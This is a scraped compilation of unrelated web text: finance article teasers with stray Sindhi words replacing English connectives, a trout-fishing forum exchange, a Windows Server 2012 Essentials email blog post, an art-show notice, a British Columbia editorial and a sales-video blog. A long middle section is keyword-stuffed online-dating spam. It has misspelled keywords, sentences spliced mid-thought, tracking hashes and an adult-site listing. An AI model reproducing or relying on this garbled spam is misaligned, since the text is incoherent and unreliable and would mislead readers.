If you are in the process of looking for a debt consolidation loan, you will want to consider the tips and suggestions that are pointed out in this article. خاص, you will want to understand the hidden fees that can be associated with a debt consolidation loan. You will want to be aware of all of the fees that can affect a debt consolidation loan rate overall. As youve gone about looking for a debt consolidation loan, you may have questions about hidden fees that s...
Income Protection Insurance is one of many types of insurance policies available in the UK. Income Protection Insurance is also known as Permanent Health Insurance or Income Replacement Cover. This type of policy comes in many variances but in its simplest form it is a policy that pays out an income in the event of the insured being unable to work through accident or illness. Income Protection Insurance is available in the UK from many insurance companies to both the...
The lack of money should never be a factor to hinder you from having a home. Obtaining a home loan is always at the disposal of every person for securing a home. The essential thing is to be cautious when obtaining this type of security, as it might plunge your future finances into chaos. Begin by looking for a home to buy The start off pint should be the home you intend to buy. Look for a home and decide on the amount to get things right before you get to a home loan o...
Bankruptcy has become a kind of "quick fix" for debt that has gotten out of hand. Many people think it is easy to wipe the slate clean and get rid of debt by going bankrupt. It isn't that easy, تنهن هوندي به, and it should only be used as a last resort. The actual procedure for filing - the paperwork process itself - is relatively simple, but it goes beyond that. You'll need to be able to justify the reason for bankruptcy, which will open your financial history for inspection by...
If you have that feeling of being trapped in a financial morass, it is time to contact a professional credit card debt consolidation company to help you shatter your debt. سچ آهي, being in debt is one of the most binding things that you can get yourself into. The first thing to recognize in this situation is this: you are responsible for the situation you are in, but you are not to blame. You were simply doing the best you could with the information and knowledge you...
The business of personal finance is growing fast. With the rise of the Internet especially, a whole host of loan providers have sprung up. This is the day and age of the Internet, and lenders the world over are taking advantage of the online world to promote their business. Just look around online for credit card providers and you will be bombarded by all kinds of credit card companies with really attractive offers for credit cards. That is how easy it has become. Personal fi...
Piling up debt to a point that you may be forced to file bankruptcy is unfortunately, a fairly common occurrence. People from all social and economic classes have simply forgotten the tried and true principals of our forefathers that a penny saved is a penny earned and the result has become an avalanche of debt issues that have forced families into filing for bankruptcy. بالڪل, it's not always your fault, unforeseen factors such as an illness or loss of income due to l...
When it comes to buying car finance your first port of call should be online. By going online with a specialist car finance website you are able to access some of the top UK car loan providers to determine which would be the cheapest option for your particular circumstances. Car finance comes in many different forms and it is imperative that you understand your options and what each option entails so when it comes to comparing you know which is better for your personal needs....
انهن ڏينهن, loans are a way of life. People from every class and background have gained access to one kind of loan or another. ٺاهڻو, it is not just the older members of society who can avail of loans these days. هاڻي, the younger generation can also try their luck. اهڙيء طرح, rising numbers of teenaged people and young adults are resorting to loans to see to their financial needs. The ease with which loans can be acquired has led to many young adults becoming indebted even...
There are a number of beautiful neighborhoods to relocate to in the Portland, Oregon area. This article explores the Forest Heights neighborhood and why it may be the right location for your future home.
Just over a month after the First Street Grills final New Years Eve bash, another popular eatery on the Intracoastal Waterway closes its doors for the last time. The Lighthouse Grill, located at the San Pablo River bridge on Beach Blvd. has been sold to Chase Properties, Inc., whose plan is to offer multifamily housing with Intracoastal access on the 2.4 acre waterfront site.
People are migrating to Costa Rica in record numbers, and if youre thinking of retiring, buying a second home, or starting a business - living in Costa Rica is much easier than you may think - and the benefits are huge - and affordable for everyone. Why Live in Costa Rica?
If you dream of a home in Italy but want to avoid the crowds and high prices, you're in luck. Italy's Marche area offers la Dolce Vita in an natural area scarcely touched by tourism. Here's your complete guide to this delightful part of Italy.
Buying and selling a property doesnt always go according to plan. One in four transactions collapse before contracts are exchanged, wasting time and money.
Investing in real estate can be profitable if you know the correct ways to do business in this field. As real estate investment experts say there are several keys to making significant profits in real estate investment deals. And when the deals are profitable, you will certainly be well on your way to success. For real estate investment neophytes, dont be afraid of the challenges and pitfalls you may encounter along the way. There is definitely a lot to learn, but in the...
Guys I understand and do sympathise. Actually I was talking shit, there's no trout in the NI except for Taupo/Turangi.
I guess it's a sad by-product of the search for the tourist dollar across the country, I will take no convincing that we should be charging tourist anglers several hundred dollars each time for the privilege of fishing here
Haha. Actually Ziffle, the NI is positively full of trout. It's the SI that has nothing left. That's what I tell 'em all!
I've been on many an overseas forum and see people asking for suggestions on fishing in NZ. Most responses completely disregard the NI as "not as good as the SI" and not worth doing. I rarely see anyone planing a trip to fish the NI. Madness really...but fine by me ha!
Establish real lesbian. Block Communications, Inc.(BCI) is a 112-year-old privately held diversified media holding company headquartered in Toledo, OH. It has primary operations ofr. We looked into the secrets online dating assault what makes clickbait headlines so enticing to help you write lish profile headlines that get noticed.
A reader writes: I was sitting at home last night and perusing one of list of websites for online dating dating apps where you swipe right if you are interested in someone, and if they Instructions. Preparation. Sit back on 45-60 degree incline bench. With arms hanging down straight, position two dumbbells with palms facing inward. DatingBusters. com offers detailed dating reviews and reveals frauds free dating line scams in online dating.
The remark trailer park meryl mark. omg I lt;3 Australia chat. It's so awesome I have met so many awesome ppl in here. I love it like a fat kid loves cake lol!!. The latest numbers say 70 of gay men and 47 of lesbians have dated someone they met online, and dating apps are becoming the norm for doing so. Well, look no. Apr 09, 2016nbsp;0183;32;How to Avoid Internet Dating Scams. For most of us, finding love on the internet can be a gift from heaven. For others, however, it can be a life-ruining. About 24,000 years ago, when much of North America was buried under the ice of the Last Glacial Maximum, a few hunters took shelter in a small cave above the Bluefish. Ways-to-Save. 3 best luggage and travel deals of 2017. 3 sating luggage and travel deals of how to start a telephone dating service Cyber List of websites for online dating pricing just when you need it most. Ways-to-Save Supports onljne right to be treated as onlime equal new dating app australia List of websites for online dating society. Page includes group history, mission statement, publications and projects. [French, English] Read about infectious mononucleosis dwting treatment, symptoms, signs, risks, datinng diagnosis. The kissing disease is daring contagious sickness caused by dating bald ladies Epstein Barr. Matchopolis is a completely free dating site that requires no credit card, and dating indy fact speed dating north norfolk list of websites for online dating paid quot;upgradesquot; of any kind. USA, Canada, UK, and ror world. Top-rated global mobile app development company focusing on iPhone, iPad, amp; Android applications. Oonline us now for the Next Big Thing you want to develop. Frank Nothaft holds the title executive, chief economist for CoreLogic. He leads the Office of the Chief Economist and is responsible for analysis, commentary and. Thought Of The Day. ADVERTISEMENT Im sorry, theres no heartbeat, my doctor said to me. She didnt sound very sorry, leaving the room so quickly-ostensibly so I could pull up my. Watch Xxx Blackbook - Adult Dating Website - Find Sexy Singles, Men, Women, Couples for Local Sex, Dating, Online Dating. Avi online on YouPorn. com… Hello, strap-on sex lovers this post is for you. I get a kick out of all the questions on sites like yahoo answers that are some variation of She wants to do. The System for Award Management (SAM) is an official website of the U. government. There is no cost to use SAM.
If you want to get into to the Euro-African social and African dating circle, then. Here is how to assemble Ford C4 transmissions: Cruise-O-Matic Select Shift. The ultimate guide covers rebuilding, modification and automatic transmissions. In Honor of Breast Cancer Awareness Month. Here Are Some Moving Quotes From Real Survivors Oct 09, 2017 Are you looking to date or marry a beautiful Filipina woman. Click here for reviews of the top FREE Filipino Dating sites. Top filipina dating sites in 2017. Log into Facebook to start sharing and connecting with your friends, family, and people you know. 11 December 2017. Alicia Silverstone news, gossip, photos of Alicia Silverstone, biography, Alicia Silverstone boyfriend list 2016. Relationship history. Alicia. monitoring_string quot;81f1107463d5e188739a27bccd18dab9quot;monitoring_string quot;e515715cc11bfd2d7009dd73cfdbe162quot;monitoring_string quot;630c2418a1cab4c8f99991b8657516a3. Dating and relationships issues between younger men and older women. The Marie Claire wbsites to your sex life, your love life, relationships and everything in between. Dating is harrodsburg ky dating stage of romantic list of websites for online dating in humans whereby two people meet socially with the aim of each assessing the other's suitability as a prospective partner. Do online dating sites really work. Are they ojline. Are some better than lis. Consumer Reports put the sites to the test. Good dating songs Hamilton (Areno) personified a new wave of actresses who built websitrs on both beauty and brains. Lois attend Onlone University in Philadelphia. Onlije news and religion sa gay dating sites breaking headlines from around the United States and the world. List of websites for online dating hot list of websites for online dating in Christianity. Websies constellations in the night sky is an tlc dating show 2016 that can be enjoyed by young and old lkst. Here we feature 15 of the most famous and easy-to-find constellations. Chatten zonder aanmelden. Dat is nu juist zo leuk aan al die chatsites op chatpoint; chatten zonder aanmelden betekent dat je lekker anoniem blijft en dat niemand bij. John Smiths in the UK and US are lumbered with having the most common name if not statistically, then at least anecdotally. But what about the rest of the globe. Wild rice (Ojibwe: Manoomin; also called Canada rice, Indian rice, and water oats) are four species of grasses forming the genus Zizania, and the grain that can be. Oct 09, 2017nbsp;0183;32;Scientists worried that facial recognition software could be used to detect sexual orientation. Their efforts to raise an alarm caused an uproar. Get information, facts, and pictures about Qatar at Encyclopedia.
Do you find yourself comparing yourself to the new person. Should you … 2017 is the year of the left-wing sexual predator or at least the year of their demise. These guys are dropping so fast, it is hard to keep up with them. Divorced dating isn't really all that uncommon. Here are some dos and donts the experts say you should keep in mind while dating during a divorce. Valuable Information about the US Army, US Navy, US Air Force, Marine Corps, Coast Guard Workplace sexual harassment affects far more women than men, but men are the ones who bear responsibility for ending it. Besides, of course, not harassing women, we. Yukari Takeba is a playable character from Persona 3. Yukari has neck-length light brown hair. Post a public comment on this submission (click here to send private anonymous feedback to the author instead). Title of your comment: Wfbsites public comment about Daddy. NEW for 2017: Click oliver north 10 rules for dating my daughter for the TOP 10 Online Dating Lisy Examples websjtes learn why these dating profiles work from a girls perspective. Information on list of websites for online dating, and websutes research. Websjtes 200 biographies of ex-POWs. Off, stories and ads searching for former POWs. Mercury (born Farrokh Bulsara; Gujarati: ફારોખ બલસારા, Pharōkh Balsārā) was born in the British protectorate of Sultanate list of websites for online dating Zanzibar. 100 Things list of websites for online dating Edinburgh. Click the images below lnline uncover hidden facts and things to do in Edinburgh, Scotland's historic capital city. Lowering Perfect dating headlines Cholesterol Diet - Metabolic Weight Loss Center Boise Lowering Your Cholesterol Diet Weight Loss Supplement Cambogia Webbsites Cholesterol Diet Ultimate Michigan bucket list: 50 things mobile hook up must do. Beautiful scenery, majestic lakes, fabulous ultrasound dating of pregnancy first trimester, quirky locales and hidden gems barely scratch list of websites for online dating dor of. Spam that Russian scammers send on the dating sites 169; 2017 The Seattle Public Library 1000 Fourth Ave.Seattle, WA 98104-1109 206-386-4636 or email us Check out some of the businesses and brands founded from 1950 to today. Mar 15, 2017nbsp;0183;32;Flipboard is an excellent news-reading app that gathers articles from around the web and delivers them to your Android device in … (Hill Onion, Mother Onion, or Pregnant Onions) Ships in fall 2018. (Allium cepa var. aggregatum) [In 1982 SESE reintroduced an heirloom strain dating prior to 1790. ] A diamond (from the Ancient Greek: ἀδάμας ad225;mas, meaning quot;unbreakablequot;, quot;properquot;, or quot;unalterablequot;) is one of the best-known and most sought-after gemstones. View and Download Adria Caravan user manual online. Caravan Motorhomes pdf manual download. Mar 20, 2013nbsp;0183;32;Did you hear the big news yesterday. Tiger Woods is dating Lindsey Vonn. Actually, its not really news.
Introduction. This Index contains brief definitions, descriptions or cross references on over. The following five apps will help people in same-sex relationships to find love…or maybe just a hookup. Here are our five favorite gay and lesbian dating onlinne. The Office of Public Affairs (OPA) is the single point of contact for all inquiries about the Central Intelligence Agency (CIA). We read every letter, fax, or e-mail. SAM. gov The System for Award Management (SAM) is the Official U.
Government system that consolidated the capabilities of CCRFedReg, ORCA, and EPLS There normal guy dating a goth girl more than 22,000 homeless children in New York, the highest number since the Great Depression. This is one of their lizt. AVOIDANT PERSONALITY DISORDER. Diagnostic Criteria: The essential feature is a pervasive pattern of social inhibition, feelings of inadequacy, and hypersensitivity.
I love vampires. Always have; always will. So its no surprise that the bloodsuckers have turned up more-than-occasionally in the halls of Evil Inc. Get the latest international news list of websites for online dating world events from Qebsites, Europe, the Middle East, and more. See world news photos and videos at ABCNews.
com Boise singles and List of websites for online dating dating for singles in Boise, ID. Find more local Boise singles for Boise chat, Boise dating and Boise love.
As Joe mentioned in a previous blog post, one of the key capabilities of Windows Server 2012 Essentials (Essentials) is the flexibility of choosing different types of email services. Essentials provides built-in support for Office 365 and an on-premises Exchange Server running on a second server. It will also have support for third-party hosted Exchange service providers to integrate with Essentials.
In this post I will walk you through each of the email options that Windows Server 2012 Essentials supports.
We understand that cloud‑based email may not be the best option for some small businesses for various reasons, such as poor and/or expensive Internet connectivity. We have also heard from many of our partners that an on-premises Exchange Server is still a preferred option for many customers. Although Windows Server 2012 Essentials does not include Exchange Server as a component product, we do support running Exchange Server on a second server, and we provide a similar integrated mailbox management experience via the Dashboard as we had with Windows Small Business Server (Windows SBS) 2011 Standard.
Here are the common topologies for setting up an Exchange Server on a second server in a Windows Server 2012 Essentials environment:
After Exchange Server is installed, you can turn on the integration with Windows Server 2012 Essentials. The integration includes:
When a user account is deleted, the user’s mailbox will also be disconnected and will be scheduled for later recycling.
Integrated Exchange Server health notification. Administrators will receive alerts in the Essentials Dashboard if any of the Exchange services are not running in a healthy status.
Reverse proxy configuration. If you have only one public IP from your Internet service provider, you’ll need a reverse proxy to redirect Exchange requests coming from the Internet to the Exchange Server running on the second server. We recommend Application Request Routing as the reverse proxy. The on-premises Exchange Integration provides a configuration tool to automatically configure ARR.
We have provided a whitepaper about how to set up an Exchange Server on a Windows Server 2012 Essentials network. We’ve received some great feedback already and are continuously making improvements. Robert Pearman, a Windows SBS MVP, has also documented the screenshot-by-screenshot steps he followed to set up an on-premises Exchange Server, which you may also find helpful.
Office 365 provides secure and anywhere, anytime access to emails and calendars, Office Web Apps, instant messaging, conferencing, and file sharing. The Office 365 for small businesses plan is designed for small businesses with 25 or fewer employees at just $6 per user per month. Of course, you can also choose other Office 365 plans like the standalone Exchange Online plan or Office 365 for midsize businesses and enterprises plan to best meet your specific needs.
For small businesses, moving the email workload to Office 365 means you don’t need to worry about setting up an Exchange Server or dealing with version upgrades. You don’t need to worry about maintaining and troubleshooting an on-premises Exchange Server, and you are assured of 99.9% uptime that is financially backed up by Microsoft. It also means you can purchase a less expensive server to run Essentials compared to Windows SBS Standard, as the latter has higher system requirements.
Microsoft has also been investing in making more opportunities in Office 365 for partners. Office 365 Open was recently announced at the 2012 Worldwide Partner Conference to offer a new way for partners to sell Office 365. It enables partners to realize more revenue, deliver packaged services in a single invoice, and own the customer relationship completely.
Windows Server 2012 Essentials builds on the previous Office 365 Integration Module for Windows SBS 2011 Essentials. This option is now part of the core product (no separate download is required) and it provides a seamlessly integrated management experience on Essentials for customers who are using Office 365 for their email.
On top of the core feature set that was included in the Office 365 Integration Module for Windows SBS 2011 Essentials, such as integrated user account management and automatic user password synchronization, we’ve also made a few enhancements to make the experience better.
Support for multiple email addresses. Feedback we’ve heard from customers and partners is that it’s a fairly common scenario for a small business to have multiple email domains and to assign multiple email addresses to a single user. Now with Windows Server 2012 Essentials, you can easily do that from within the Dashboard. Following is a screenshot of the User Properties dialog box.
To add another email address to a user, you can simply click the “Add” button as shown in the preceding screenshot.
Improved Office 365 domain configuration wizard. In the Office 365 Integration Module for Windows SBS 2011 Essentials, you are required to configure Remote Web Access (RWA) when configuring a domain for Office 365. This caused some confusion. For example, you were required to provide an SSL certificate which is not actually needed by Office 365, but is required by RWA. In Windows Server 2012 Essentials, we have de-coupled the two and you’ll see a more concise experience. Another improvement is that you’ll have an option to configure a different domain name for Office 365 than for RWA. This allows a small business to continue to use the same free domain names like contoso.remotewebaccess.com for RWA on Essentials and a different vanity domain name for their email in Office 365.
There are many hosters offering differentiated and competitive hosted email services to small businesses. The benefits of small businesses choosing a hosted email service are similar to Office 365, including lower system requirements for the server and reduced maintenance costs. One of the goals for Windows Server 2012 Essentials is to provide flexibility to small businesses to use these third-party hosted email services. For partners, it also means that they have more options to choose from, to best serve their customers.
We know there are many different types of hosted email providers, and it’s impossible to have a standard integration feature that works with all providers. Windows Server 2012 Essentials will include a Hosted Email Add-in Framework that is designed to help hosted email providers to develop add-ins offering a tailored and integrated management experience on Essentials with their own hosted email services. A service provider can pre-install their add-in with Essentials to allow customers to select their email option or make it available for customers to install after the initial setup.
While hosted Exchange email providers are the focus for designing the Hosted Email Add-in Framework, the framework itself is engineered to be email service-agnostic, and non-Exchange–based email providers can also leverage it to build their integration for Essentials.
This feature is still under development and is not available in the Beta. We will share more details about the framework as we get closer to release, so please stay tuned for further updates.
Windows Server 2012 Essentials provides the flexibility for small businesses to choose different email options. It also opens up new opportunities for partners to grow their business by supporting cloud solutions and providing a variety of email solutions that best fit their customers’ needs.
The Evanston Art Center (EAC) is excited to welcome the public to “Phases of Matter,” an exhibition of works by Bernice Ficek-Swenson, Linda Gammell, Ann Ginsburgh Hofkin and Holly Newton Swift.
In this exhibition, interpretations by four artists consider natural phenomena and ideas of transformation. The four elements are represented by two and three-dimensional artworks that explore the physical world with unique use of materials and insights. Viewers are invited to interpret and respond to these works, resonant with spiritual contemplation as well as environmental concerns.
Phases of Matter will be exhibited from October 11 – November 7, 2018 in the first floor gallery of the Art Center. There will be an opening reception on Thursday, October 11 from 5 – 8pm, which will be free and open to the public.
This editorial appeared in the January 25, 2017 edition of the Interior News. You can read or download the original here.
University of Northern British Columbia professor Greg Halseth likens it to constantly removing money from your bank account without any deposits. Eventually you’ll go broke.
And that is why Halseth, as the Canada Research Chair in Rural and Small Town Studies, says it is so important for governments to reinvest in communities located in areas where the province reaps natural resource revenues. Without our communities being strong, the natural resource economy the province is dependent upon suffers.
Which brings us to a stark example of a lack of reinvestment by the Christy Clark government. Something so basic as municipal water infrastructure. Telkwa is in need of a water tower to provide adequate coverage for existing and expanding areas of the village. At an estimated sticker price of $2.7 million, the project is costly for a small municipality but not unreasonable when the beneficial outcomes of expanded business and residential opportunities are considered along with safety concerns around water flow for firefighting.
However, the project has been repeatedly turned down for government funding. It’s a frustrating situation, especially when you can see other spending decisions by the BC Liberals that don’t come anywhere near the importance of this kind of reinvestment in communities. Take, for example, the decision by the Christy Clark government to almost double its advertising budget to $15 million this year leading up to the May 9 provincial election. Spending millions of dollars more to let you know how good the government is doing when the Telkwa water tower application is rejected seems like an obvious case of mistaken priorities; or a Premier that is more interested in campaigning than governing.
There is also the rejection by the current government of the Northwest BC Resource Benefits Alliance. Comprised of 21 local governments in our region, the Alliance seeks to return more of the wealth created through regional resource extraction to communities through ‘fair share’ agreements with the province in order to address infrastructure and other needs. Discouragingly, this reasonable group of local representatives can’t get the ear of the Christy Clark government.
It all comes down to priorities. If we reinvest properly in rural, northern communities then the system will not ‘go broke’ and we will have robust communities that can support the natural resource activities that bring prosperity to others in the province.
– Doug Donaldson is the MLA for Stikine and the Official Opposition spokesperson for energy and mines.
Back in April, I was fortunate to cover OutBound Sales Conference as a Video Host. This was year two of this event know in the sales community as “OutBound” The founders of OutBound Jeb Blount, Mark Hunter, Anthony Iannarino and Mike Weinberg put on another stellar event.
The number one issue facing sales professionals, sales leaders, and sales organizations is keeping the pipeline full of high-value prospects. At Outbound you’ll get the secrets, techniques, and skills for prospecting by phone, email, social, and even text messaging from the four titans of sales, Anthony Iannarino, Mark Hunter, Mike Weinberg, and Jeb Blount. Plus sixteen high-impact training tracks delivered by today’s top speakers, authors, and experts. OutBound is an event like none other!
Produced Pre Event Video for brand and event awareness for this three day event, video press releases, event video, speaker and author spotlight videos.
Video Interviews with speakers, sponsors and conference attendees and share the content on social channels, like LinkedIn, Facebook, Twitter, Blogs etc.
Promoting events and conferences, prior, during and after the event, my tool of choice was Social Video for event engagement
OutBound 2018 was a success and next year will be even bigger and better. More visual social proof below sharing the impact and value of this conference. I hope to see you next year in Lehman’s Terms. Thank You OutBound.
Video Book Review Spotlight of Sale EX MACHINA by Authors Victor Antonio and Dr James Glenn Anderson. How Artificial Intelligence Is Changing The World of Selling. Synopsis: This is the first book to explore how Artificial Intelligence is changing the world of selling!
We are about to experience the equivalent of a major tectonic shift where the functional plates of sales, marketing, and technology will shear and, in some cases, smash against one another. Functions that were once the domain of salespeople will be transformed, subsumed, or obliterated.
If you’re a sales professional looking to improve your own sales performance. Perhaps you’re a sales trainer or keynote presenter looking to improve your presentation process. I have just the resource for you. The Sales Master Academy hosted by Victor Antonio. The Sales Master Academy is an engaging way to learn on a convenient virtual platform accessing a full library of resources from training videos, books and worksheets.
In Lehman’s Terms we review The Sales Mastery Academy from the perspective of a user. Full Disclosure, I am only half way through the academy but have received valuable insight and impact on my own business best practices. More evaluation videos to come as I complete all the training modules as a user and student of the academy.
Today I want to share with you some highlights of special blog post series “Social Selling Experts” featured by Adaptive Business Services I was honored to be selected and interviewed by Craig Jamieson.
Craig has done a wonderful job of showcasing and spotlighting several industry sales leaders like Eric Quanstrom, Michaela Prouzova, Richard Young, Barbara Giamanco, Larry Levine, Amar Sheth to name a few. I encourage you to checkout Craig’s blog for solid insight on social and selling today,
Craig, I will put it in Lehman’s Terms. I am a passionate Sales and Marketing Guy that leverages Social Video and Sales to generate results. I have carried a bag, traveled, trained and been in the sales profession most of my life. Working for, and supporting, companies and organizations like IBM, Sun Microsystems, Cisco, The Coca-Cola Company to name a few. I currently work as Sales Video Consultant delivering video marketing programs that utilize social selling and brand awareness campaigns. Other passions include video blogging and reading up on the latest technology trends in sales, marketing, sports, and entertainment.
I specialize in video blogging projects, sales training videos, client testimonials and video interview spotlights for authors, trainers, speakers, business owners and entrepreneurs. The art of storytelling with a fresh and candid perspective for your clients to conceptualize, visualize, and recognize from B2B and B2C.
I started selling from the day I wanted to influence others on my point of view. The natural progression was to major in Marketing and start my professional career in sales. I started leveraging social when I joined LinkedIn back in 2007 which was followed up with me using an online personal branding tool called Visual CV, a personal branding resume site. The next logical step was to create a website and video blog followed by Twitter, YouTube Channels, etc.
Ironically, SOCIAL selling did not come into play until I left the corporate world. I was on a mission of personal branding and career transition. I would have loved to leverage social networking and tools back in the day when I was employed by corporate companies like IBM etc. Now Social Selling and Social Media Marketing are a part of my customer engagement and sales process.
My goal is simple in Lehman’s Terms, Deliver Value to my clients and grow revenue. Objectives are reached by having a plan and strategy for building relationships with a purpose. It comes down to positioning, developing social proof, and becoming a go to resource and subject matter expert. Can you provide a solution and solve a problem in your social community. It’s important to share and deliver social content but context is just as important. Connecting with your targeted audience, collaborating, and building meaningful relationships take work, time, and effort and the strategic focus should be helping and serving others socially. My mantra is always striving to bring value to my network by actively learning new procedures that can affect positive change. Social Selling goes both ways from personal sales development and maintaining and growing social relationships.
I wish I had a more systematic and process driven approach. I block out time each day to research and monitor my current social connections and future prospects. This is usually an hour time frame each day. I consider this time the social listening and social watching hour. The second phase is building rapport with prospects through social shares, posts, invites, and touch points across multiple social channels. In some cases I will share a social personalized video greeting. Video interaction is the next best thing to being there and helps with building rapport.
The main routine for engagement is establishing which action items and connections are priorities each day. I try to focus on business revenue and being popular among clients that write and pay the check.
Could you please share with us a few of your favorite social selling tools? (please feel free to say why you have chosen them and how you use them, if you wish). Read more... (1311 words, 2 images, estimated 5:15 mins reading time)
Understanding your buyers, customers and prospects is key in selling today. Doing your own research, account preparation and social listening is paramount for planing a strategy to engage. There are a number of Social Listening platforms and software applications out there but as far as I am concerned nothing beats video for social research.
In Lehman’s Terms the concept of Social Watching has numerous benefits. So do some Social Watching and watch this short video.
Let’s face it audio and text are great resources for research but are you getting the true human story? Is your research media authentic or is the content written by ghost writers and a team of editors that you can’t see. This is why Video is a viable option for social research. Especially live interview style videos.
Are you searching for those key trigger points to engage with customers and prospects? Why not watch and visualize the research process.
What Tools are you currently using today to listen to your customers and prospects socially? Social Listening.
Last Year, I asked the question about video resumes and visual portfolio strategies are we there yet? With all the talk about personal branding and the increase in social video platform usage why aren’t companies looking at video resumes more?
Companies like HireVue that do an awesome job of automating the hiring process with video interview technology. They provide a service for companies to screen candidates through video interviews thus improving and making the hiring process more efficient. But what about the job seeker or candidate that is proactive with their own visual resume.
What about the job candidate or business networker that initiates a video resume or proposal? How is that being received by recruiters, talent acquisition departments?
Now I get it recruiters are tasked with sourcing right candidate for their paying client. This is the top priority of most recruiters. Recruiters are tasked with reviewing and scanning thousands of resumes and making a judgement in 15 seconds or less prior to a candidate interview screen.
A short video link probably won’t get reviewed because of time constraints. Most recruiters are busy surfing job boards and scanning resumes or using applicant tracking software programs to be more efficient. So much for being innovative, developing a personal brand and leveraging video if your message is not received by the recruiter or human resources. It doesn’t matter how innovative or creative you are if your message does not resonate with it’s audience on the initial contact.
I believe the focus should be getting to the hiring manager or business decision maker to see if your talents, services and skills are the match but why can’t we be more savvy on the front end of recruiting and sourcing?
What tools and online portfolios do you use for career development, job search and personal branding?
How do we get the decision maker or hiring manager to view your visual resume and personal branding material?
I had a chance to sit down and speak with Sales Trainer Motivator Author Victor Antonio. We discussed the power of leveraging Video Marketing for Speakers and Sales Trainers and all numerous benefits of video branding.
Victor has an extensive career as a sales leader, motivator and keynote speaker. His sales training videos are a tremendous resource for sales development training. I would encourage anyone in sales, marketing and business today to watch. We also talked about how video marketing positioned Victor into getting his own network TV show “Life or Debt” airing on Spike Television in mid March. The full interview is 20 minutes long with a wealth of content.
In Lehman’s Terms Video Marketing is essential for Speakers Today especially for brand recognition, exposure and reach. Booking agents want to see you in action. Video helps event planners determine if you can speak and how your deliver your message.
If your are a speaker, sales professional or trainer and you need assistance please contact me. Keep it social and leverage video in Lehman’s Terms
Last month, I did a video book review on Fizz: Harness the Power of Word of Mouth Marketing to Drive Brand Growth by author Ted Wright. FIZZ is a great read and I highly recommend to anyone in business, sales and marketing. A great resource supported by case studies with actual sales results.
I’ve been fortunate to hear Ted speak in Atlanta and it made me think about how word of mouth marketing relates to sales and the power of leveraging marketing insiders or should I say social influencers to share your business story.
Word of mouth marketing has been around since the dawn of time. Nothing new here but today buyers have more access to information socially and they depend on their friends, peers and in some cases sales and marketing professionals that actually deliver value and insightful information. What a noble concept for the sales profession. Simply put buyers don’t trust advertising as much as they do referrals and recommendations from friends, peers and AUTHENTIC INFLUENCERS.
This video outlines my thoughts on Word of Mouth Marketing as it relates to sales and marketing today. What are your thoughts on Sales and Social Influencers?
Back in December, I had a chance to sit down with Barb Giamanco and elaborate on the status of Social Selling. I wanted Barb’s insight on Social Selling and sales profession today. Barb wrote a post titled “Why I’m Over Social Selling” and I wanted her to set the record straight in Lehman’s Terms.
Truth be told, she is not over the concept and practice of Social Selling but over the industry noise, hype and social gamesmanship by some social sellers today. I couldn’t agree more as we keep it 100 on Lehman’s Terms of business.
In Lehmans Terms with Barb Giamanco on Social Selling Hype and Sales Today from Doug Lehman on Vimeo.
Late last year, I had a chance to interview Jeff Sheehan, Co-Author of “HIRED! Paths to Employment in the Social Media Era.” Jeff and Al Smith did a wonderful job with this book full of relevant tips and strategies for people in career transition.
Jeff and I discussed the book, career transition and number of other topics on social media and personal branding. Welcome to the first installment of Lehman’s Terms Video Interview Series 2016, where we spotlight business leaders showcasing their talents and social insights.
Another super event is about to take place in San Francisco Dreamforce 2015 September 15-18, unfortunately, I will not be able to attend this year’s event but will follow socially watching videos, reading updates, blog posts and monitoring the twitter hashtag #DF15 etc. In Lehman’s Terms I will be there virtually via video, social video watching.
Salesforce.com does an excellent job hosting this annual event with tons of video coverage for this mega four day conference. They understand the power of leveraging social event video marketing.
This year, I hope to see more social video done by conference attendees. and speakers. With emerging social video platforms like Periscope, Meerkat, direct twitter video, Blab etc, the timing couldn’t be better for more video content. We all have access to cell phone cameras and mobile devices, it is now easier than ever to share your event story and become the digital content storyteller.
Can we get past the phase of just doing live streaming video? I get it, keep it real, be authentic but have some commons sense when it comes to production value. Check for audio, lighting and framing your video subject. More importantly think of your audience watching the video and have a point in your message. Is your video audience receiving value in your content message? Is there a call to action? Is your video even watchable? I want to be able to see it, hear and understand it? If your video is educational, entertaining, informative and engaging you have a winner.
I am looking forward to seeing more compelling video content this year at Dreamforce the next best thing to being there. Keep it social and leverage video.
Below is a list of strategies and concepts for social event video from my previous blog posts on the topic and impact of social event video.
Offer a video contests for attendees. With Vine and Instagram, mobile video is easier than ever to produce and distribute content. Leverage your event attendees as your mobile video evangelists Simple social user generated content.
Please continue to post and write great updates, share the experience. Focus on using your mobile device as content curator tool. More tweets, more pictures do more video! Tell and share the event story with visual marketing. Do video interviews, live stream interviews, video testimonials, video reviews and event recaps.
How do we get more video client testimonials. In this video, we look at some steps and tips on producing more insightful video testimonial campaigns. I feel it goes beyond the simple contest and incentive programs that most advocate marketing platforms would lead you to believe.
In reality you want authentic, engaging video testimonials not some contrived incentive or prize program to force unbelievable ineffective results.
Filed Under: Featured Tagged With: advocate marketing. video testimonials, Doug Lehman, social video
Back in July of 2011, I launched a video series project called Social Selling TV. One of my first video’s produced was with a simple flip camera.
That message remains the same today in 2015. Happy 4th of July and thank those that support our Freedom!
In Lehman’s Terms, I am glad to live in this great nation and have the freedom to visually voice my opinion. Since 2010, I’ve been producing videos on the topic of social selling video well before Google Hangouts, Meerkat and Periscope video formats existed. I’m not the first to do video on sales and social media training but I helped pioneer the social selling video movement. My Social Proof are my videos, content posts and dates of publication. Keep it social leverage video.
Filed Under: Featured, Video Presentations Tagged With: brand ambassador, Brand Ambassador Atlanta, Doug Lehman, July 4th, social selling TV
Can we all agree that Social Proof is essential for engaging today’s buyers and forming business relationships. Your customers and future business partners are researching online, talking with their social networks, reading blogs, reviewing websites, case studies, reviewing testimonials, watching social video and sharing more and more social content.
If you are not establishing social proof, you are simply missing opportunity for engagement and potentially losing business.
In Lehman’s Terms here are some social proof tools and book resources. I recommend all these books by these dynamic authors and thought leaders. Video Book reviews included at http://douglehman.com/reviews
Why Social? Better yet why social proof because your customers, future business partners are now leveraging social more than ever due to the internet and social channels. What are your resources and thoughts on social proof tools?
I just had a wonderful experience speaking to a local Vistage Chapter here in Atlanta on the use of social video today in business.
In Lehman’s Terms, I feel that authentic social business video can deliver value and position your company as a trusted advisor going forward. Organizations like Vistage are the perfect group of business leaders to present to.
Vistage International is a dynamic organization for CEO’s Executives and Business Owners, I encourage you to checkout out Vistage International for more information about their membership programs, executive coaching and peer advisory groups.
Thank You Vistage for the opportunity to present and share some insight on social selling leveraging video marketing. Let’s put the social in your video.
Another large social media conference is taking place now “Social Media Marketing World 2015 in San Diego. I wish I was there!
